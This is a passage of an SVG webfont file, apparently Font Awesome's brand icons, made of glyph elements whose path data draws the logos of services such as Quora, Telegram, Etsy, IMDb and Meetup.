s-19.4287 5.71387 -24.8574 14.2861c-5.14258 -8.57227 -14.5713 -14.2861 -24.5703 -14.2861c-10.2861 0 -19.4287 5.71387 -24.8574 14.2861c-5.14355 -8.57227 -14.5713 -14.2861 -24.5713 -14.2861c-18.8574 0 -29.4287 15.7139 -29.4287 32.8574
c-16.2861 -12.2852 -35.7158 -19.4287 -56.5713 -19.4287c-22 0 -43.4287 8.28516 -60.2861 22.8574c10.2852 0.286133 20.5713 2.28613 30.2852 5.71387c-20.8574 5.71387 -39.4277 18.8574 -52 36.2861c21.3701 -4.64551 46.209 -1.67285 67.1426 11.1426
c-22 22 -56.5703 58.8574 -68.5713 87.4287c-5.71387 13.4287 -6.85645 31.4287 -6.85645 45.7139c0 49.7139 20.2861 160 86.2861 160c10.5713 0 18.8564 -4.8584 23.1426 -14.8574c3.0498 4.46289 8.42578 11.374 12 15.4277c2 2.57227 5.71387 5.42969 7.14355 8.28613
c7.99902 12.5713 11.7139 21.1426 21.7139 34c32.2852 41.1445 81.7139 69.4297 134.856 69.4297c6 0 12 -0.285156 17.7148 -1.14355c10.8564 11.7148 26 18.2861 41.7148 18.2861c14.5703 0 29.7139 -6 40 -16.2861c0.856445 -0.857422 1.42773 -2.28613 1.42773 -3.42773
c0 -3.71387 -10.2852 -13.4287 -12.8574 -16.2861c4.28613 -1.42871 15.7148 -6.8584 15.7148 -12c0 -2.85742 -2.85742 -5.14258 -4.57129 -7.14258c31.4287 -27.7148 49.4287 -67.1436 56.2861 -108c4.28613 5.14258 10.2852 8.57129 17.1426 8.57129
c10.5713 0 20.8574 -7.14355 28.5713 -14.001c20.8564 -18.5703 25.7139 -53.1416 25.7139 -79.7139zM188 358.572c0 -18.2861 12.5713 -37.1436 32.2861 -37.1436c19.7139 0 32.2852 18.8574 32.2852 37.1436c0 18 -12.5713 36.8564 -32.2852 36.8564
c-19.7148 0 -32.2861 -18.8574 -32.2861 -36.8564zM237.714 254c0 19.7139 3.71387 39.1426 8.57129 58.2861c-52.0391 -79.5342 -13.5312 -184.571 68.8574 -184.571c21.4287 0 42.5713 7.71387 60 20c2 7.42871 3.71484 14.8574 3.71484 22.5723
c0 14.2861 -6.28613 21.4277 -20.5723 21.4277c-4.57129 0 -9.14355 -0.856445 -13.4287 -1.71387c-63.3438 -12.668 -107.143 -3.66895 -107.143 63.999zM196.572 -0.858398c0 11.1436 -8.8584 20.8574 -20.2861 20.8574c-11.4287 0 -20 -9.71484 -20 -20.8574v-32.5703
c0 -11.1436 8.57129 -21.1426 20 -21.1426c11.4277 0 20.2861 9.71484 20.2861 21.1426v32.5703zM245.715 -0.858398c0 11.1436 -8.57227 20.8574 -20 20.8574c-11.4287 0 -20.2861 -9.71484 -20.2861 -20.8574v-32.5703c0 -11.1436 8.85742 -21.1426 20.2861 -21.1426
c11.4277 0 20 10 20 21.1426v32.5703zM295.428 -0.858398c0 11.1436 -8.85645 20.8574 -20.2852 20.8574s-20.2852 -9.71484 -20.2852 -20.8574v-32.5703c0 -11.1436 8.85645 -21.1426 20.2852 -21.1426s20.2852 9.71484 20.2852 21.1426v32.5703zM345.143 -0.858398
c0 11.1436 -8.85645 20.8574 -20.2852 20.8574s-20.2861 -9.71484 -20.2861 -20.8574v-32.5703c0 -11.1436 8.85742 -21.1426 20.2861 -21.1426s20.2852 10 20.2852 21.1426v32.5703zM421.714 162c-30.8564 -59.1416 -90.2852 -102.572 -158.571 -102.572
c-96.5703 0 -160.57 84.5723 -160.57 176.572c0 16.8574 2 33.4287 6 49.7139c-20 -33.7148 -29.7139 -72.5723 -29.7139 -111.429c0 -60.2861 24.8564 -121.715 71.4287 -160.857c5.14258 9.71387 14.8564 16.2861 26 16.2861c10 0 19.4277 -5.71387 24.5713 -14.2861
c5.42871 8.57129 14.5703 14.2861 24.8574 14.2861c10 0 19.4277 -5.71387 24.5713 -14.2861c5.42871 8.57129 14.8564 14.2861 24.8574 14.2861c10 0 19.4287 -5.71387 24.8574 -14.2861c5.14258 8.57129 14.5713 14.2861 24.5723 14.2861
c10.8564 0 20.8564 -6.57227 25.7139 -16c43.4268 36.2861 68.5693 92 71.4258 148.286zM432.286 261.714c0 53.7139 -34.5713 105.714 -92.5723 105.714c-30.2852 0 -58.5713 -15.1426 -78.8564 -36.8564c-19.9951 -66.3828 -27.4473 -136.571 41.4287 -136.571
c28.8047 0 97.3564 28.5381 84.2861 -36.8574c28.8564 26 45.7139 65.7148 45.7139 104.571z" />
    <glyph glyph-name="google-plus" unicode="&#xf2b3;" horiz-adv-x="496" 
d="M248 440c136.9 0 248 -111.1 248 -248s-111.1 -248 -248 -248s-248 111.1 -248 248s111.1 248 248 248zM177.3 68c71.2998 0 118.8 50.4004 118.8 121.2c0 7.09961 -0.599609 13.8994 -1.89941 20.7002h-116.9v-42.6006h70.1006
c-5.2002 -34.2002 -37.5 -53.2998 -70.1006 -53.2998c-43 0 -77.2002 35.5 -77.2002 78.0996c0 42.6006 34.3008 78.1006 77.2002 78.1006c18.1006 0 36.2002 -6.2002 49.4004 -19.1006l33.5996 32.6006c-22.8994 21.2998 -51.7002 32.2998 -83 32.2998
c-68.7998 0 -124 -55.5 -124 -124s55.2002 -124 124 -124zM407.5 174.2h35.2002v35.5h-35.2002v35.5h-35.5v-35.5h-35.5v-35.5h35.5v-35.5h35.5v35.5z" />
    <glyph glyph-name="font-awesome" unicode="&#xf2b4;" 
d="M397.8 416c27.5 0 50.2002 -22.7002 50.2002 -50.2002v-347.6c0 -27.5 -22.7002 -50.2002 -50.2002 -50.2002h-347.6c-27.5 0 -50.2002 22.7002 -50.2002 50.2002v347.6c0 27.5 22.7002 50.2002 50.2002 50.2002h347.6zM352.4 131.7h0.0996094v140.3
c0 4.2002 -4.2002 7.7998 -9 7.7998c-6 0 -31.0996 -16.0996 -53.7998 -16.0996c-4.7002 0 -8.90039 0.599609 -13.1006 2.39941c-20.2998 7.7002 -38.1992 13.7002 -60.8994 13.7002c-20.9004 0 -43 -6.5 -61.5 -14.2998
c-1.7998 -1.2002 -3.60059 -1.7998 -5.40039 -2.40039v18.5c8.2998 6 13.1006 15.5 13.1006 26.3008c0 18.5996 -15 33.5 -33.5 33.5c-18.6006 0 -33.5 -15 -33.5 -33.5c0 -10.8008 5.2998 -20.3008 13.0996 -26.3008v-218.6c0 -11.2998 9 -20.2998 20.2998 -20.2998
c8.90039 0 16.7002 5.89941 19.1006 14.2998v1.2002c0.599609 1.2002 0.599609 3 0.599609 4.7998v45.4004c1.2002 0.599609 2.40039 0.599609 3.59961 1.19922c19.7002 8.90039 44.2002 17.3008 67.5 17.3008c32.3008 0 44.8008 -16.7002 71.7002 -16.7002
c19.2002 0 37.1006 6.5 53.7998 13.7002c4.2002 1.7998 7.80078 3.59961 7.80078 7.7998z" />
    <glyph glyph-name="linode" unicode="&#xf2b8;" horiz-adv-x="447" 
d="M437.4 221.7c0.599609 -2 -8.80078 -66.2998 -9.7002 -72.7998c0 -0.900391 -0.5 -1.7002 -1.10059 -2l-54.5996 -43.7002c-1.09961 -0.900391 -2.59961 -0.900391 -3.7002 0l-20.2998 14l-2.2998 -33.4004c0 -0.899414 -0.200195 -1.7002 -1.10059 -2.2998
l-66.8994 -53.4004c-1.10059 -0.899414 -2.90039 -0.899414 -4 0l-28 23.7002l2 -46c0 -0.899414 -0.200195 -1.7002 -1.10059 -2.2998l-83.6992 -66.9004c-0.600586 -0.299805 -1.10059 -0.599609 -1.7002 -0.599609c-0.900391 0.299805 -1.7002 0.299805 -2.2998 0.900391
l-65.1006 69.0996c-1.5 1.40039 -15.5 72 -16.8994 79.0996c-0.300781 1.10059 0.5 2.5 1.39941 3.10059l17.4004 10.5996c-3.40039 3.2002 -26.5 23.4004 -27.1006 26.2998l-20.5996 100.301c-0.299805 1.09961 0.299805 2.5 1.7002 3.39941l26.8994 12.9004
c-4.59961 3.5 -37.6992 27.5 -38.5996 30.8994l-27.4004 133.101c-0.299805 1.7002 0.600586 3.09961 2 3.7002l123.7 38.5996c0.600586 0 1.40039 0 2.2998 -0.299805l90.6006 -43.7002c0.799805 -0.599609 1.7002 -1.7002 1.7002 -2.59961l5.69922 -132.301
c0 -1.19922 -0.599609 -2.2998 -1.69922 -2.89941l-33.7002 -17.4004l36 -24.2998c0.799805 -0.299805 1.39941 -1.40039 1.39941 -2.2998l1.40039 -35.1006l34.5996 21.2002c0.800781 0.600586 2.2002 0.600586 3.10059 0l24 -16l0.899414 31.4004
c0 0.899414 0.5 2 1.40039 2.59961l58.9004 36c1.09961 0.600586 2.19922 0.600586 3.09961 0l70 -38.5996c0.5 -0.600586 1.09961 -1.10059 1.40039 -2zM232.6 216.9l-100.6 -57.2002l14 -96.6006l90.5996 61.2002zM224.9 396.9l-120.9 -46.6006l19.7002 -134.8
l106.6 55.4004zM44 274.9l73.0996 -57.2002l-19.3994 132.899l-79.7002 49.4004zM74.5996 127.1l64.8008 -60.7998l-13.7002 93.4004l-70 58.2998zM98.9004 9.40039l57.6992 -61.2002l-9.69922 67.3994l-61.7002 60.9004zM163.4 -55.0996l78.1992 62.2998l-3.09961 70
l-85.7002 -61.4004zM245.4 60l27.0996 -22.9004l-0.599609 68.3008l-29.4004 22.5996c0 -2.2998 1.2002 -6.2998 -1.09961 -8l-22.3008 -14.9004l24.3008 -20c2.89941 -2.19922 2 -21.6992 2 -25.0996zM339.7 85.4004l4.2002 66.8994l-65.7002 -46.8994l0.599609 -68.6006z
M367.4 111.1l5.7998 66.6006l-64.6006 40.5996l-0.599609 -30l41.2002 -27.2002c0.799805 -0.599609 1.39941 -1.69922 1.09961 -2.59961l-2 -34zM422 150.9l8.5 63.3994l-51.0996 -36.5996l-5.7002 -65.1006z" />
    <glyph glyph-name="quora" unicode="&#xf2c4;" horiz-adv-x="447" 
d="M440.5 61.2998c1.7998 -18 -7.2002 -93.2998 -89 -93.2998c-49.5 0 -75.5 28.7002 -95.2002 62.2998c-117.7 -32.5996 -249 54.9004 -249 189c0 117 98 196.7 197.7 196.7c101.8 0 198.5 -79.2002 198.4 -196.7c0 -65.5 -30.5 -118.8 -74.7002 -153
c14.2002 -21.5996 29 -35.7998 49.5 -35.7998c22.5 0 31.5 17.2998 33 30.7998h29.2998zM297 118.8c11.2998 24.9004 16.7998 58.7002 16.7002 100.5c0 104.2 -32.5 157.7 -108.7 157.7c-75 0 -107.5 -53.5 -107.5 -157.9c0 -103.699 32.5 -156.699 107.5 -156.699
c12 0 22.7002 1.19922 32.7002 4.19922c-15.5 30.5 -33.7002 61.3008 -69.2002 61.3008c-6.7998 0 -13.5996 -1 -19.7998 -4l-12.2002 24.2998c14.7002 12.7998 38.5 22.7998 69 22.7998c47.7998 0 72 -23 91.5 -52.2002z" />
    <glyph glyph-name="free-code-camp" unicode="&#xf2c5;" horiz-adv-x="575" 
d="M69.2998 303.5c-41 -68.5 -36.3994 -163 1 -227c22.2002 -38.2002 49.7002 -52.4004 49.7002 -66.5c0 -6.7998 -6 -13 -12.7998 -13c-19.5 0 -99.2002 75.5 -99.2002 197.8c0 111.5 78 186 97.0996 186c6 0 14.9004 -4.7998 14.9004 -11.0996
c0 -12.7002 -28.2998 -28.6006 -50.7002 -66.2002zM265.1 89.7002c-37.1992 13.5996 -65.5 45.8994 -65.2998 86.2002c0 48 57.7002 90.0996 57.7002 136.199c0 16.8008 -10.4004 32.6006 -19.5996 38.2002c-1.90039 1 -4.60059 2.7002 -4.60059 5.10059
c0 9.59961 26.1006 2.7998 36.5 -2.2002c33.6006 -15.9004 40.6006 -40.2998 46.4004 -74.1006c1.39941 -7.89941 4.2998 -33.2998 15.8994 -33.2998c7.5 0 12.3008 5.10059 12.3008 12.2998c0 12.6006 -15.4004 31.2002 -7.2002 31.2002
c6.09961 0 18.5996 -12.7998 22.5 -16.8994c23.3994 -24.9004 32.0996 -49 32.0996 -82.6006c0 -42.2002 -23.3994 -74.7002 -53.0996 -89.7998c-9.2002 -5.7998 -12.1006 0.900391 -12.1006 1.90039c0 7 29.5 23.5996 29.5 56c0 10.5996 -2.69922 22.5 -8.5 31.3994
c-1.69922 2.40039 -7.69922 10.1006 -11.0996 10.1006c-0.700195 0 -0.700195 -0.5 -0.700195 -1.2002c0 -5.7998 3.60059 -11.4004 3.60059 -17.4004c0 -13 -31.9004 -20.2002 -31.9004 6.7998c0 7.10059 0.700195 14.3008 0.700195 21.3008
c0 5.09961 -0.200195 6.5 -2.40039 11.0996c-3.39941 6.5 -14.5 19.7998 -22.5 19.7998c-2.2002 0 -2.89941 0 -2.89941 -2.2002c0 -3.39941 7.69922 -7 7.69922 -19.2998c0 -32.0996 -44.1992 -37.8994 -44.1992 -70c0 -14.3994 1.89941 -26.5 10.0996 -38.5996
c5.09961 -7.5 10.5996 -11.7998 19.0996 -15.2002c2.10059 -0.700195 4.30078 -0.900391 4.30078 -3.59961c0 -6.40039 -7.80078 -3 -12.3008 -1.2002zM470.4 381c21.3994 0 97.5996 -78.9004 97.5 -198.2c0 -104.899 -73.4004 -185.7 -98.8008 -185.7
c-5 0 -13.1992 6.30078 -13.1992 11.4004c0 8.2002 28.2998 34.5996 35.2998 43.5c61 76.7002 64 205.9 -17.6006 291c-5.5 5.7998 -17.5996 16.7002 -17.5996 25.4004c0 6.09961 8.40039 12.5996 14.4004 12.5996zM428.1 57.9004c8.40039 0 11.9004 -7 11.9004 -15.5
c0 -8.90039 -2.5 -16.4004 -11.9004 -16.4004h-261.1c-8.5 0 -15.5 7 -15.5 15.5c0 8.90039 6.09961 16.4004 15.5 16.4004h261.1z" />
    <glyph glyph-name="telegram" unicode="&#xf2c6;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM369.8 270.1c3.60059 16.8008 -6.09961 23.5 -17.2002 19.5l-239.1 -92.1992c-16.4004 -6.40039 -16.0996 -15.5 -2.7998 -19.7002l61.2002 -19.1006l142 89.4004
c6.59961 4.40039 12.6992 1.90039 7.69922 -2.5l-114.899 -103.8l-4.40039 -63.1006c6.40039 0 9.2002 2.80078 12.5 6.10059l29.9004 28.7998l62 -45.7002c11.2998 -6.39941 19.3994 -3.09961 22.3994 10.5z" />
    <glyph glyph-name="bandcamp" unicode="&#xf2d5;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM296.2 113.9l84.7002 156.1h-181l-84.7002 -156.1h181z" />
    <glyph glyph-name="grav" unicode="&#xf2d6;" horiz-adv-x="512" 
d="M301.1 236c4.40039 -4.40039 4.40039 -11.9004 0 -16.2998l-9.69922 -9.7002c-4.40039 -4.7002 -11.9004 -4.7002 -16.6006 0l-10.5 10.5c-4.39941 4.7002 -4.39941 11.9004 0 16.5996l9.7002 9.7002c4.40039 4.40039 11.9004 4.40039 16.5996 0zM270.9 255.7
c-2.7002 -2.7998 -7.40039 -2.7998 -10.5 0c-2.80078 3 -2.80078 7.7002 0 10.5c3 3 7.69922 3 10.5 0c3 -2.7002 3 -7.5 0 -10.5zM244.9 250.4c2.7998 3 7.5 3 10.5 0c2.7998 -2.7002 2.7998 -7.40039 0 -10.2002c-3 -3 -7.7002 -3 -10.5 0c-3 2.7002 -3 7.39941 0 10.2002
zM317.4 263.7c-19.9004 14.3994 -33.8008 43.2002 -11.9004 68.0996c21.5996 24.9004 40.7002 17.2002 59.7998 -0.799805c11.9004 -11.2998 29.2998 -24.9004 17.2002 -48.2002c-12.5 -23.5 -45.0996 -33.2002 -65.0996 -19.0996zM365.1 308.2
c-8.89941 10 -23.2998 -6.90039 -15.5 -16.1006c7.40039 -9 32.1006 -2.39941 15.5 16.1006zM504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM437.8 149.4c2.5 16.0996 -20.2002 16.5996 -25.2002 25.6992
c-13.5996 24.1006 -27.6992 36.8008 -54.5 30.4004c11.6006 8 23.5 6.09961 23.5 6.09961c0.300781 6.40039 0 13 -9.39941 24.9004c3.89941 12.5 0.299805 22.4004 0.299805 22.4004c15.5 8.59961 26.7998 24.3994 29.0996 43.1992
c3.60059 31 -18.7998 59.2002 -49.7998 62.8008c-22.0996 2.5 -43.7002 -7.7002 -54.2998 -25.7002c-23.2002 -40.1006 1.40039 -70.9004 22.4004 -81.4004c-14.4004 1.40039 -34.3008 11.9004 -40.1006 34.2998c-6.59961 25.7002 2.7998 49.8008 8.90039 61.4004
c0 0 -4.40039 5.7998 -8 8.90039c0 0 -13.7998 0 -24.6006 -5.30078c11.9004 15.2002 25.2002 14.4004 25.2002 14.4004c0 6.40039 -0.599609 14.9004 -3.59961 21.5996c-5.40039 11 -23.7998 12.9004 -31.7002 -2.7998c0.0996094 0.200195 0.299805 0.400391 0.400391 0.5
c-5 -11.8994 -1.10059 -55.8994 16.8994 -87.2002c-2.5 -1.39941 -9.09961 -6.09961 -13 -10c-21.5996 -9.69922 -56.2002 -60.2998 -56.2002 -60.2998c-28.1992 -10.7998 -77.1992 -50.8994 -70.5996 -79.7002c0.299805 -3 1.40039 -5.5 3 -7.5
c-2.7998 -2.19922 -5.5 -5 -8.2998 -8.2998c-11.9004 -13.7998 -5.2998 -35.2002 17.7002 -24.3994c15.7998 7.19922 29.5996 20.1992 36.2998 30.3994c0 0 -5.5 5 -16.2998 4.40039c27.6992 6.59961 34.2998 9.39941 46.1992 9.09961c8 -3.89941 8 34.2998 8 34.2998
c0 14.7002 -2.19922 31 -11.0996 41.5c12.5 -12.1992 29.0996 -32.6992 28 -60.5996c-0.799805 -18.2998 -15.2002 -23 -15.2002 -23c-9.09961 -16.5996 -43.2002 -65.9004 -30.3994 -106c0 0 -9.7002 14.9004 -10.2002 22.0996
c-17.4004 -19.3994 -46.5 -52.2998 -24.6006 -64.5c26.6006 -14.6992 108.801 88.6006 126.2 142.301c34.6006 20.7998 55.4004 47.2998 63.9004 65c22 -43.5 95.2998 -94.5 101.1 -59z" />
    <glyph glyph-name="etsy" unicode="&#xf2d7;" horiz-adv-x="384" 
d="M384 100c-1.75 -10.75 -13.75 -110 -15.5 -132c-117.879 4.29883 -219.895 4.74316 -368.5 0v25.5c45.457 8.94824 60.627 8.01855 61 35.25c1.79297 72.3223 3.52441 244.143 0 322c-1.0293 28.46 -12.1299 26.7646 -61 36v25.5
c73.8857 -2.3584 255.933 -8.55078 362.999 3.75c-3.5 -38.25 -7.75 -126.5 -7.75 -126.5h-23.249c-11.0527 42.835 -18.7588 90.5 -54.75 90.5h-137c-10.25 0 -10.75 -3.5 -10.75 -9.75v-163.75c58 -0.5 88.5 2.5 88.5 2.5c29.7695 0.951172 27.5596 8.50195 40.75 65.251
h25.75c-4.40723 -101.351 -3.91016 -61.8291 -1.75 -160.25h-25.75c-9.15527 40.0859 -9.06543 61.0449 -39.501 61.5c0 0 -21.5 2 -88 2v-139c0 -26 14.25 -38.25 44.25 -38.25h89.251c63.6357 0 66.5645 24.9961 98.751 99.75h22.249v-0.000976562z" />
    <glyph glyph-name="imdb" unicode="&#xf2d8;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM21.2998 218.8h-0.299805c0.0996094 0.100586 0.200195 0.299805 0.299805 0.400391v-0.400391zM97 128.2v127.8h-33v-127.8h33z
M210.2 128.2v127.8h-43l-7.60059 -59.9004c-2.69922 20 -5.39941 40.1006 -8.69922 59.9004h-42.8008v-127.8h29v84.5l12.2002 -84.5h20.6006l11.5996 86.3994v-86.3994h28.7002zM221.6 128.2c86.1006 -0.100586 75 -6 75 82.5c0 8.09961 0.300781 16.7998 -1.39941 24.3994
c-4.2998 22.5 -31.4004 20.9004 -49 20.9004h-24.6006v-127.8zM382.5 157.4v36c0 17.2998 -0.799805 30.0996 -22.2002 30.0996c-8.89941 0 -14.8994 -2.7002 -20.8994 -9.2002v41.7002h-31.7002v-127.8h29.7998l1.90039 8.09961
c5.69922 -6.7998 11.8994 -9.7998 20.8994 -9.7998c19.7998 0 22.2002 15.2002 22.2002 30.9004zM265 218.1v-49.2998c0 -9.7002 1.90039 -18.7002 -10.2998 -18.3994v83.6992c11.8994 0 10.2998 -6.2998 10.2998 -16zM350.5 192v-32.7002
c0 -5.39941 1.59961 -14.3994 -6.2002 -14.3994c-1.59961 0 -3 0.799805 -3.7998 2.39941c-2.2002 5.10059 -1.09961 44.1006 -1.09961 44.7002c0 3.7998 -1.10059 12.7002 4.89941 12.7002c7.2998 0 6.2002 -7.2998 6.2002 -12.7002z" />
    <glyph glyph-name="ravelry" unicode="&#xf2d9;" horiz-adv-x="511" 
d="M407.4 386.5c72.6992 -37.9004 112 -117.2 103.3 -199.5c-1.7002 -16.7002 -4.40039 -36.2002 -9.7998 -52.2002c-22.2002 -65.7002 -52.9004 -108.6 -123.101 -147.7c-6.39941 -4.39941 -13.2998 -8.59961 -20.2002 -10.7998
c-12.5 -4.39941 -26.0996 -5.39941 -40.0996 -3.89941c-5.90039 -0.5 -11.7998 -0.700195 -18 -0.700195c-93.7002 0 -173 64 -196.9 151.399c-0.699219 0 -1.5 0.200195 -2.19922 0.200195c-5.60059 -44.2998 27.0996 -104.1 27.0996 -104.1s2 -3 13.2998 -20.2002
c-62.7998 33.2002 -64.5 131.2 -64.5 131.2c-15 5.59961 -67.2002 23.3994 -76.2998 37.8994c0 0 40.9004 -22.3994 76.2002 -27c-0.200195 0.300781 0.5 7.90039 0.5 7.90039c2.2002 30 12.5 53.4004 23.0996 71.4004c6.90039 33.7998 22.1006 64.2998 43.2998 89.8994
c3.7002 15.2998 9.60059 33.5 19.9004 52.7002c4.40039 8.40039 8.59961 13.7998 19.9004 19c74.8994 35 148.699 43.9004 224.5 4.5zM138.8 284.8c-7.59961 -11.2998 -13.7002 -23.5996 -18.8994 -36.3994c8.09961 8.59961 14.7998 14.1992 18.1992 16.6992
c-0.5 7.40039 0.700195 19.7002 0.700195 19.7002zM107.6 162.9c0.700195 -9.60059 2 -18.9004 4.2002 -28.1006l41.4004 -6.89941c-14.1006 42.0996 -15.7998 90.0996 -15.7998 90.0996c-16.5 -16 -25.4004 -37.9004 -29.8008 -55.0996zM115.5 120.1
c21.4004 -69.6992 81 -122.8 154.1 -134.399c-1 0.299805 -1.69922 0.5 -2.69922 1c0 0 -81 47.5 -108.301 124.3c-9.09961 1.5 -28.2998 5.90039 -43.0996 9.09961zM386 3.90039c63 32 106.6 98 106.8 174c0 107.399 -86.5996 194.5 -193 194.5
c-49.2998 0 -94.0996 -18.7002 -128.3 -49.5c-5.2002 -10.1006 -8.59961 -22.9004 -11.0996 -39.4004c52.5 44.5996 146 33.5 146 33.5c23.3994 -1 20.5996 -21.7002 20.3994 -28.0996c-85.2002 7.19922 -127 -17.2002 -168.399 -52.4004
c0 0 8.09961 -78.7998 26.7998 -110.8c107.8 -4.90039 189.8 53.7002 189.8 53.7002c10.2998 7.39941 19.4004 8.09961 21.4004 -4.7002c1.5 -10.4004 2.19922 -24.4004 -9.60059 -29.7998c-36 -16.8008 -75.5996 -27.3008 -115 -33
c-25.5996 -3.7002 -39.7998 -4.60059 -78 -3.90039c36.4004 -84.7002 127.5 -107.8 127.5 -107.8c28.5 -4.7002 50.2002 -1 64.7002 3.7002z" />
    <glyph glyph-name="sellcast" unicode="&#xf2da;" 
d="M353.4 416c52.0996 0 94.6992 -42.5996 94.6992 -94.5996v-258.801c0 -52 -42.5996 -94.5996 -94.6992 -94.5996h-258.7c-52.1006 0 -94.7002 42.5996 -94.7002 94.7002v258.7c0 52 42.5996 94.5996 94.7002 94.5996h258.7zM303.4 99.5996
c27.8994 48.2002 11.1992 110.5 -37.2002 138.5c-18.6006 10.8008 0.0996094 -0.0996094 -18.5 10.7002c-25 14.4004 -46.2002 -23.2998 -21.6006 -37.5c18 -10.2002 0.800781 -0.399414 18.6006 -10.5996c27.5996 -16 37.2002 -51.7998 21.2998 -79.4004
c-16 -27.5996 -51.7998 -37.2002 -79.4004 -21.2998c-18.5996 10.7998 0.100586 -0.0996094 -18.5 10.7002c-10.2998 6 -23.5996 2.39941 -29.5 -7.90039l-15.6992 -27.2002c-12.6006 -21.7998 19.3994 -53 42.2998 -13.1992c48.2998 -27.7002 110.3 -11 138.2 37.1992z
M325.2 308.4c14.2998 24.7998 -23.4004 46.3994 -37.7002 21.5l-4.7998 -8.40039c-48.2998 27.7002 -110.3 11 -138.2 -37.2002c-27.7998 -48.2998 -11.0996 -110.6 37.0996 -138.399c18.6006 -10.8008 -0.0996094 0.0996094 18.5 -10.7002
c25 -14.4004 46.2002 23.2998 21.6006 37.5c-0.100586 0 -18.6006 10.5996 -18.6006 10.5996c-27.5996 16 -37.2998 51.7998 -21.2998 79.4004c16 27.5996 51.7998 37.2002 79.4004 21.2998c18.5996 -10.7998 -0.100586 0.0996094 18.5 -10.7002
c10.2002 -5.09961 20 -2.89941 26.5 3.60059c2.7002 2.69922 2 2 19 31.5z" />
    <glyph glyph-name="superpowers" unicode="&#xf2dd;" 
d="M448 416l-87.2002 -87c39.7002 -38.7002 61.2002 -92.7002 57.7002 -148.2c-5.40039 -93 -76.9004 -167.3 -168.7 -179.8c-83.2998 -11 -166.5 -22 -249.8 -33l86.7998 86.7998c-39.7998 38.7002 -61.0996 92.7002 -57.7998 148.2c5.7002 93.2998 77 167.5 169 180
c83.2002 11 166.7 22 250 33zM368.3 183.7c4.40039 80 -56.7998 146.3 -136.1 151c-78.7002 4.7998 -148.5 -55.2998 -153 -134.5c-4.40039 -80 56.7998 -146.3 136.3 -151c78.7998 -4.7002 148.6 55 152.8 134.5z" />
    <glyph glyph-name="wpexplorer" unicode="&#xf2de;" horiz-adv-x="512" 
d="M512 192c0 -141.2 -114.7 -256 -256 -256c-141.2 0 -256 114.7 -256 256s114.7 256 256 256s256 -114.7 256 -256zM480 192c0 123.2 -100.3 224 -224 224c-123.5 0 -224 -100.5 -224 -224s100.5 -224 224 -224s224 100.5 224 224zM160.9 323.4l86.8994 -37.1006
l-37.0996 -86.8994l-86.9004 37.0996zM270.9 154.3l46.5996 -94h-14.5996l-50 100l-48.9004 -100h-14l51.0996 106.9l-22.2998 9.39941l6 14l68.6006 -29.0996l-6 -14.2998zM259.1 270.6l68.6006 -29.3994l-29.4004 -68.2998l-68.2998 29.0996zM339.4 227.7
l54.5996 -23.1006l-23.4004 -54.2998l-54.2998 23.1006z" />
    <glyph glyph-name="meetup" unicode="&#xf2e0;" horiz-adv-x="527" 
d="M99 33.7002c1.09961 -5.7002 -2.2998 -11.1006 -8 -12.2998c-5.40039 -1.10059 -10.9004 2.2998 -12 8c-1.09961 5.39941 2.2998 11.0996 7.7002 12.2998c5.39941 1.2002 11.0996 -2.2998 12.2998 -8zM242.1 -37.7002c6.60059 4.60059 15.5 2.7998 19.7002 -3.7002
c4.60059 -6.59961 2.90039 -15.3994 -3.39941 -20c-6.60059 -4.59961 -15.4004 -2.89941 -20 3.7002c-4.30078 6.60059 -2.60059 15.4004 3.69922 20zM156.1 424.6c-6.2998 -1.5 -12.5 2.5 -13.8994 9.10059c-1.2002 6.2998 2.7998 12.5996 9.09961 14
c6.2998 1.5 12.6006 -2.5 13.7002 -9.10059c1.40039 -6.2998 -2.59961 -12.5996 -8.90039 -14zM34.4004 221.7c10 -7.10059 12.5996 -20.7998 5.69922 -31.2002c-6.89941 -10.2998 -20.5996 -12.7998 -30.5996 -5.7002c-10 6.90039 -12.5996 20.9004 -5.7002 30.9004
c6.90039 10.2998 20.6006 12.8994 30.6006 6zM306.4 392.6c-10.3008 -6.2998 -23.7002 -2.89941 -29.7002 7.40039c-6.2998 10.5996 -2.90039 24.2998 7.39941 30.5996c10.3008 6.30078 23.7002 2.90039 30 -7.69922c6 -10.3008 2.90039 -24 -7.69922 -30.3008zM115.3 334.6
c-7.5 -5.19922 -18 -3.5 -23.0996 4.30078c-5.10059 7.69922 -3.40039 18.2998 4.2998 23.6992c7.40039 5.10059 18 3.40039 23.0996 -4.2998c5.10059 -7.7002 3.40039 -18.2998 -4.2998 -23.7002zM487.6 178.6c7.40039 1.40039 14.8008 -3.5 16.3008 -10.8994
c1.69922 -7.7002 -3.2002 -15.2002 -10.6006 -16.6006c-7.39941 -1.69922 -14.8994 3.2002 -16.2998 10.6006c-1.7002 7.7998 3.2002 15.2002 10.5996 16.8994zM527.3 235.4c1.40039 -5.7002 -2.2998 -11.1006 -7.7002 -12.6006
c-5.69922 -1.09961 -11.1992 2.60059 -12.2998 8c-1.09961 5.7002 2.2998 11.5 8 12.6006c5.40039 1.09961 10.9004 -2.30078 12 -8zM447 309.1c8.2998 6 20 3.80078 25.7002 -4.89941c5.7002 -8.60059 3.7002 -20.2998 -4.60059 -26.2998
c-8.59961 -5.7002 -20.2998 -3.7002 -26 4.89941c-5.69922 8.60059 -3.69922 20.2998 4.90039 26.2998zM440.7 169.7c26.2998 -43.1006 15.0996 -100 -26.2998 -129.101c-17.4004 -12.2998 -37.1006 -17.6992 -56.9004 -17.0996
c-12 -47.0996 -69.4004 -64.5996 -105.1 -32.5996c-1.10059 -0.900391 -2.60059 -1.7002 -3.7002 -2.90039c-39.1006 -27.0996 -92.2998 -17.4004 -119.4 22.2998c-9.7002 14.2998 -14.5996 30.6006 -15.0996 46.9004c-65.4004 10.8994 -90 94 -41.1006 139.7
c-28.2998 46.8994 0.600586 107.399 53.4004 114.899c25.0996 66.2002 107.6 97.6006 163.6 54.2002c67.4004 22.2998 136.301 -29.4004 130.9 -101.1c41.0996 -12.6006 52.7998 -66.9004 19.7002 -95.2002zM370.7 95.4004
